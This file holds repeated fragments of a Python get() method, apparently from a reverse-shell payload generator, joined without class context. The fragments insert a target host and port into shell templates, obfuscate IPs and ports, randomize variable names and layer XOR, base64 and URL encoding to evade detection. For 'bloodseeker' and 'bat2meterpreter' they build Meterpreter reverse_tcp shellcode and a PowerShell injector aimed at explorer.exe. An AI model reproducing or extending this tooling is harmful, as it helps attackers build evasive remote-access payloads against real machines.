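    def get(self):
        """
        Generate the code.

        Stages are applied in a fixed order: optional port obfuscation,
        PORT substitution, variable-name randomization, PowerShell tuning,
        optional XOR, base64, optional URL-encoding. Each stage wraps the
        output of the previous one, so the order matters.

        Returns:
            str: the fully encoded payload (also stored in ``self.code``).
        """
        # Obfuscate the port if requested. Only PORT is substituted into
        # this template, so there is no host to obfuscate here.
        if self.args.ipfuscate:
            self.port = obfuscate_port(self.port, self.args.obfuscate_small,
                                       self.lang)

        # Plain substring replacement: every occurrence of "PORT" in the
        # template is rewritten, not just a dedicated placeholder.
        self.code = self.code.replace("PORT", str(self.port))

        # Apply variable randomization.
        self.code = randomize_vars(self.code, self.args.obfuscate_small,
                                   self.lang)

        # PowerShell tuning is called unconditionally; presumably a no-op
        # unless the relevant args are set -- confirm in powershell_wrapper.
        self.code = powershell_wrapper(self.name, self.code, self.args)

        # Apply XOR encoding unless the key is 0. Compare with ``!=`` rather
        # than ``is``: identity comparison with an int literal only works by
        # accident of CPython's small-int cache and is a SyntaxWarning on
        # Python 3.8+.
        if self.args.xor != 0:
            self.code = xor_wrapper(self.name, self.code, self.args)

        # Apply base64 encoding.
        self.code = base64_wrapper(self.name, self.code, self.args)

        # URL-encoding goes last so it covers the whole encoded blob.
        if self.args.urlencode is True:
            self.code = to_urlencode(self.code)

        return self.code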
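    def get(self):
        """
        Generate the code.

        Two paths exist:

        * Template shells (``TARGET`` and ``PORT`` both present in
          ``self.code``): substitute host/port, apply PowerShell tuning,
          then XOR (optional), base64 and URL-encoding (optional).
        * Custom shells (placeholders absent): only the "bloodseeker"
          payload is handled; it is returned raw, without the encoder
          stages. Any other custom shell is fatal.

        Returns:
            str: the generated payload.

        Raises:
            SystemExit: via ``exit(1)`` when bloodseeker is requested
            without ``--stager`` or when no custom procedure exists.
        """
        # Update of 0.3.6
        # Some custom shells will not need TARGET and PORT strings, so the
        # placeholders are looked up first. Both must be present; a template
        # with only one of them falls into the custom branch and exits.
        if "TARGET" in self.code and "PORT" in self.code:
            # Plain substring replacement, no validation or quoting of
            # self.host: whatever the operator passed is inserted verbatim.
            # TARGET is replaced before PORT, so a host value containing
            # "PORT" would itself be rewritten.
            self.code = str(self.code.replace("TARGET", self.host)).replace(
                "PORT", str(self.port))

            # Apply powershell-tuning if set in args.
            self.code = powershell_wrapper(self.name, self.code, self.args)
        else:
            # Custom shell. Here we need to program individually based in specifics.
            if "bloodseeker" in self.name.lower():  # This is for Bloodseeker project.

                # This one requires a stager.
                if self.args.stager is None:
                    print(error("This payload REQUIRES --stager flag."))
                    exit(1)

                print(info("Generating shellcode ..."))
                # NOTE(review): str.decode("base64") is Python 2 only; on
                # Python 3 this raises AttributeError (use base64.b64decode).
                # The shellcode is built from the raw CLI values
                # (self.args.host / self.args.port), not self.host / self.port.
                malicious_script = str(
                    WINDOWS_BLOODSEEKER_SCRIPT.decode("base64")).replace(
                        "SHELLCODEHERE",
                        shellcode_to_ps1("windows/x64/meterpreter/reverse_tcp",
                                         self.args.host, self.args.port))
                # Inject into explorer.exe (hard-coded process name).
                self.code = malicious_script.replace("PROCESSNAME", "explorer")
                print(
                    alert(
                        "Make sure you have a handler for windows/x64/meterpreter/reverse_tcp listening in your machine."
                    ))
                return self.code  # we dont need encoder in this one.
            else:
                print(
                    error(
                        "No custom shell procedure was arranged for this shell. This is fatal."
                    ))
                exit(1)

        # Apply XOR encoding unless the key is 0. ``!=`` rather than ``is``:
        # identity comparison with an int literal only works by accident of
        # CPython's small-int cache and is a SyntaxWarning on Python 3.8+.
        if self.args.xor != 0:
            self.code = xor_wrapper(self.name, self.code, self.args)

        # Apply base64 encoding.
        self.code = base64_wrapper(self.name, self.code, self.args)

        # Apply URL-encoding (skipped when a stager is in use).
        if self.args.urlencode is True and self.args.stager is None:
            self.code = to_urlencode(self.code)

        return self.code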
    def get(self):
        """
        Generate the code.

        Only two encoding stages apply to this payload: base64 first, then
        URL-encoding when requested, so the URL-encoding wraps the base64
        output. ``self.payload`` is updated after each stage.

        Returns:
            str: the encoded payload (same object as ``self.payload``).
        """
        # Base64 is always applied.
        self.payload = base64_wrapper(self.name, self.payload, self.args)

        # URL-encoding is opt-in; bail out early when it is not requested.
        if self.args.urlencode is not True:
            return self.payload

        self.payload = to_urlencode(self.payload)
        return self.payload
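    def get(self):
        """
        Generate the code.

        Template shells (``TARGET`` and ``PORT`` both present in
        ``self.code``) get host/port substitution, PowerShell tuning, then
        optional XOR, base64 and optional URL-encoding. Custom shells
        without the placeholders take a dedicated path: "bat2meterpreter"
        appends hex shellcode to the template and "bloodseeker" builds a
        PowerShell injector; both return without the encoder stages. Any
        other custom shell is fatal.

        Returns:
            str: the generated payload.

        Raises:
            SystemExit: via ``exit(1)`` when bloodseeker is requested
            without ``--stager`` or when no custom procedure matches.
        """
        # Update of 0.3.6
        # Some custom shells will not need TARGET and PORT strings, so the
        # placeholders are looked up first. Both must be present; a template
        # with only one of them falls into the custom branch below.
        if "TARGET" in self.code and "PORT" in self.code:
            # Plain substring replacement, no validation or quoting of
            # self.host: whatever the operator passed is inserted verbatim.
            # TARGET is replaced before PORT, so a host value containing
            # "PORT" would itself be rewritten.
            self.code = str(self.code.replace("TARGET", self.host)).replace("PORT", str(self.port))

            # Apply powershell-tuning if set in args.
            self.code = powershell_wrapper(self.name, self.code, self.args)
        else:
            # Custom shell. Here we need to program individually based in specifics.
            # TODO: I need to separate this into a custom file.

            if "bat2meterpreter" in self.name.lower():
                print(info("Generating shellcode ..."))
                # Shellcode is built from the raw CLI values (self.args.*).
                return self.code + shellcode_to_hex("windows/meterpreter/reverse_tcp", self.args.host, self.args.port)

            if "bloodseeker" in self.name.lower():  # This is for Bloodseeker project.

                # This one requires a stager.
                if self.args.stager is None:
                    print(error("This payload REQUIRES --stager flag."))
                    exit(1)

                print(info("Generating shellcode ..."))
                # NOTE(review): str.decode("base64") is Python 2 only; on
                # Python 3 this raises AttributeError (use base64.b64decode).
                malicious_script = str(WINDOWS_BLOODSEEKER_SCRIPT.decode("base64")).replace("SHELLCODEHERE", shellcode_to_ps1("windows/x64/meterpreter/reverse_tcp", self.args.host, self.args.port))

                # TODO: Create a --bloodseeker-process flag to specify process name
                process_name = "explorer"
                self.code = malicious_script.replace("PROCESSNAME", process_name)
                # Implicit concatenation instead of a backslash-continued
                # literal, which embedded the next line's indentation in the
                # message.
                print(alert("Make sure you have a handler for "
                            "windows/x64/meterpreter/reverse_tcp listening "
                            "in your machine."))
                return self.code  # we don't need encoder in this one.
            else:
                print(error("No custom shell procedure was arranged for this shell. This is fatal."))
                exit(1)

        # Apply XOR encoding unless the key is 0. ``!=`` rather than ``is``:
        # identity comparison with an int literal only works by accident of
        # CPython's small-int cache and is a SyntaxWarning on Python 3.8+.
        if self.args.xor != 0:
            self.code = xor_wrapper(self.name, self.code, self.args)

        # Apply base64 encoding.
        self.code = base64_wrapper(self.name, self.code, self.args)

        # Apply URL-encoding (skipped when a stager is in use).
        if self.args.urlencode is True and self.args.stager is None:
            self.code = to_urlencode(self.code)

        return self.code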
    def get(self):
        """
        Generate the code.

        Two stages only: base64, then URL-encoding when ``--urlencode`` is
        set, so the URL-encoding wraps the base64 output. ``self.payload``
        is updated after each stage.

        Returns:
            str: the encoded payload (same object as ``self.payload``).
        """
        # Base64 is always applied.
        self.payload = base64_wrapper(self.name, self.payload, self.args)

        # URL-encoding is opt-in; bail out early when it is not requested.
        if self.args.urlencode is not True:
            return self.payload

        self.payload = to_urlencode(self.payload)
        return self.payload
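    def get(self):
        """
        Generate the code.

        Stages in order: PORT substitution, optional XOR, base64, optional
        URL-encoding. Each stage wraps the previous one's output.

        Returns:
            str: the encoded payload (also stored in ``self.code``).
        """
        # Plain substring replacement: every occurrence of "PORT" in the
        # template is rewritten, not just a dedicated placeholder.
        self.code = self.code.replace("PORT", str(self.port))

        # Apply XOR encoding unless the key is 0. ``!=`` rather than ``is``:
        # identity comparison with an int literal only works by accident of
        # CPython's small-int cache and is a SyntaxWarning on Python 3.8+.
        if self.args.xor != 0:
            self.code = xor_wrapper(self.name, self.code, self.args)

        # Apply base64 encoding.
        self.code = base64_wrapper(self.name, self.code, self.args)

        # URL-encoding goes last so it covers the whole encoded blob.
        if self.args.urlencode is True:
            self.code = to_urlencode(self.code)

        return self.code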
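    def get(self):
        """
        Generate the code.

        Stages in order: PORT substitution, PowerShell tuning, optional
        XOR, base64, optional URL-encoding. Each stage wraps the previous
        one's output.

        Returns:
            str: the encoded payload (also stored in ``self.code``).
        """
        # Plain substring replacement: every occurrence of "PORT" in the
        # template is rewritten, not just a dedicated placeholder.
        self.code = self.code.replace("PORT", str(self.port))

        # PowerShell tuning is called unconditionally; presumably a no-op
        # unless the relevant args are set -- confirm in powershell_wrapper.
        self.code = powershell_wrapper(self.name, self.code, self.args)

        # Apply XOR encoding unless the key is 0. ``!=`` rather than ``is``:
        # identity comparison with an int literal only works by accident of
        # CPython's small-int cache and is a SyntaxWarning on Python 3.8+.
        if self.args.xor != 0:
            self.code = xor_wrapper(self.name, self.code, self.args)

        # Apply base64 encoding.
        self.code = base64_wrapper(self.name, self.code, self.args)

        # URL-encoding goes last so it covers the whole encoded blob.
        if self.args.urlencode is True:
            self.code = to_urlencode(self.code)

        return self.code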
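    def get(self):
        """
        Generate the code.

        Stages in order: PORT substitution, PowerShell tuning, optional
        XOR, base64, optional URL-encoding. Each stage wraps the previous
        one's output.

        Returns:
            str: the encoded payload (also stored in ``self.code``).
        """
        # Plain substring replacement: every occurrence of "PORT" in the
        # template is rewritten, not just a dedicated placeholder.
        self.code = self.code.replace("PORT", str(self.port))

        # PowerShell tuning is called unconditionally; presumably a no-op
        # unless the relevant args are set -- confirm in powershell_wrapper.
        self.code = powershell_wrapper(self.name, self.code, self.args)

        # Apply XOR encoding unless the key is 0. ``!=`` rather than ``is``:
        # identity comparison with an int literal only works by accident of
        # CPython's small-int cache and is a SyntaxWarning on Python 3.8+.
        if self.args.xor != 0:
            self.code = xor_wrapper(self.name, self.code, self.args)

        # Apply base64 encoding.
        self.code = base64_wrapper(self.name, self.code, self.args)

        # URL-encoding goes last so it covers the whole encoded blob.
        if self.args.urlencode is True:
            self.code = to_urlencode(self.code)

        return self.code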
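    def get(self):
        """
        Generate the code.

        Stages, in order: optional host/port obfuscation (not for
        PowerShell), TARGET/PORT substitution, variable randomization,
        PowerShell tuning, optional XOR, base64, optional URL-encoding.
        Custom shells without the TARGET/PORT placeholders take a
        dedicated path instead: "bat2meterpreter" appends hex shellcode
        to the template and "bloodseeker" builds a PowerShell injector;
        both return without the encoder stages. Any other custom shell
        is fatal.

        Returns:
            str: the generated payload.

        Raises:
            SystemExit: via ``exit(1)`` when bloodseeker is requested
            without ``--stager`` or when no custom procedure matches.
        """
        # Obfuscate IP and port if set in args. Windows/PowerShell shells
        # don't support ipfuscation, so the language is checked too.
        if self.args.ipfuscate and self.lang != "powershell":
            self.host = ipfuscate(self.host, self.args.obfuscate_small)
            self.port = obfuscate_port(self.port, self.args.obfuscate_small,
                                       self.lang)

        # Update of 0.3.6
        # Some custom shells will not need TARGET and PORT strings, so the
        # placeholders are looked up first. Both must be present; a template
        # with only one of them falls into the custom branch below.
        if "TARGET" in self.code and "PORT" in self.code:
            # Plain substring replacement, no validation or quoting of
            # self.host: whatever the operator passed (or ipfuscate produced)
            # is inserted verbatim. TARGET is replaced before PORT, so a host
            # value containing "PORT" would itself be rewritten.
            self.code = str(self.code.replace("TARGET", self.host)).replace(
                "PORT", str(self.port))

            # Apply variable randomization.
            self.code = randomize_vars(self.code, self.args.obfuscate_small,
                                       self.lang)

            # Apply powershell-tuning if set in args.
            self.code = powershell_wrapper(self.name, self.code, self.args)

        else:
            # Custom shell. Here we need to program individually based in specifics.
            # TODO: I need to separate this into a custom file.

            if "bat2meterpreter" in self.name.lower():
                print(info("Generating shellcode ..."))
                # Shellcode is built from the raw CLI values (self.args.*),
                # not the possibly-obfuscated self.host / self.port.
                return self.code + shellcode_to_hex(
                    "windows/meterpreter/reverse_tcp", self.args.host,
                    self.args.port)

            if "bloodseeker" in self.name.lower():  # This is for Bloodseeker project.

                # This one requires a stager.
                if self.args.stager is None:
                    print(error("This payload REQUIRES --stager flag."))
                    exit(1)

                print(info("Generating shellcode ..."))
                # NOTE(review): str.decode("base64") is Python 2 only; on
                # Python 3 this raises AttributeError (use base64.b64decode).
                malicious_script = str(
                    WINDOWS_BLOODSEEKER_SCRIPT.decode("base64")).replace(
                        "SHELLCODEHERE",
                        shellcode_to_ps1("windows/x64/meterpreter/reverse_tcp",
                                         self.args.host, self.args.port))

                # TODO: Create a --bloodseeker-process flag to specify process name
                process_name = "explorer"
                self.code = malicious_script.replace("PROCESSNAME",
                                                     process_name)
                # Implicit concatenation instead of a backslash-continued
                # literal, which embedded the next line's indentation in the
                # message.
                print(
                    alert(
                        "Make sure you have a handler for "
                        "windows/x64/meterpreter/reverse_tcp listening "
                        "in your machine."))
                return self.code  # we don't need encoder in this one.
            else:
                print(
                    error(
                        "No custom shell procedure was arranged for this shell. This is fatal."
                    ))
                exit(1)

        # Apply XOR encoding unless the key is 0. ``!=`` rather than ``is``:
        # identity comparison with an int literal only works by accident of
        # CPython's small-int cache and is a SyntaxWarning on Python 3.8+.
        if self.args.xor != 0:
            self.code = xor_wrapper(self.name, self.code, self.args)

        # Apply base64 encoding.
        self.code = base64_wrapper(self.name, self.code, self.args)

        # Apply URL-encoding (skipped when a stager is in use).
        if self.args.urlencode is True and self.args.stager is None:
            self.code = to_urlencode(self.code)

        return self.code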